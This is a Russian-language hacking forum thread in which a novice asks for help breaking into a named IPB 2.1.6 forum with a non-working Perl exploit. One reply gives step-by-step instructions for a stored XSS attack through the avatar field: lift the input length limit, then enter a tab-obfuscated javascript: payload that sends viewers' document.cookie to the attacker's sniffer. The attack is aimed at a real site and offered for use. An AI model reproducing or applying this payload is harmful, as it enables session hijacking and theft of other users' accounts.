Я новичек в хаке и хочу взломать форум http://gazeta.mirsofta-game.ru/forum/index.php это IPB 2.1.6 я скачал с securitylab.ru эксплоит под этот форум но он не компилируется и выдает ошибку хотя я вродибы все правильно заполнил не могли бы вы вписать нужные параметры и выложить эксплоит здесь код сплоита: http://www.securitylab.ru/bitrix/redirect.php?event1=gateway_click&event2=poc&event3=270627&goto=http%3A%2F%2Fwww.securitylab.ru%2Fpoc%2Fextra%2F270626.php
не пашет выдает ошибку SplitString '{Webdings} 22' at 1.cgi line 24 SplitString '{Verdana} 7 bold' at 1.cgi line 25 SplitString '{Verdana} 8 bold' at 1.cgi line 46 SplitString '{Verdana} 8' at 1.cgi line 47 unknown option "-command" at D:\Documents and Settings\GOD.XQTH3PASQTBNGY7\Мои документы\perl5.00402-bindist04-bc\perl5.00402-bindist04-bc\perl\lib\site/Tk/Derived.pm line 309. запускал в perl expresse пробывал денвером пишет в error.log: Premature end of script headers: /home/localhost/cgi-bin/1.cgi Can't locate Tk.pm in @INC (@INC contains: .) at \\home\\LOCALH~1\\cgi-bin\\1.cgi line 14.\n BEGIN failed--compilation aborted at \\home\\LOCALH~1\\cgi-bin\\1.cgi line 14.\n
Прежде чем компилить надо хоть знать этот язык программирование(пример С++) на котором написан сплойт! Когда ты будешь компилить сплойт ты всегда будешь стречатся с таким видом проблемы! Это специально сделаны баги от скрипкидессов и ламасосов! Где то неправельно кавычка поставленна или скобка не вту сторону закрыта и т.д! Ты же не будешь качай новый сплойт и говорить исправти мне багу или какая там проблемма в сплойте почему не компилиться и т.д!
Глянул, тут можно обойтись без сплойтов. Народ, вы не забывайте, что не все 216 пропатчены от ХСС в аватаре. Короче, darckEditor, заходи на страницу установки аватары, сохрани ее на харде, открой блокнотом ищи что то типа maxlenght = 80 (можно просто дать поиск по слову max) и измени его с 80 на 800 например. Далее пиши в поле путь к аватаре j a v a s c r i p t:x=document.cookie%3Bimg=new%20Image()%3Bimg.src=%27ТВОЙ СНИФЕР%3F%27%2Bx/*.jpg*///.gif В слове javascript стоят табуляции. В общем, те, кто глянуть твой авик отдадут тебе свои куки. Если не получиться, пиши в личку...
Не умеешь\ленишься юзать поиск - ничего никогда у тебя не получится. Тема была по случаю появления баги и повторялась потом несколько раз в Уязвимостях форумов. Было и описание и видео. Ещё говрилось о том чтобы забить на эксплойт от рст (умные сильнонах) и юзать сплойт руками.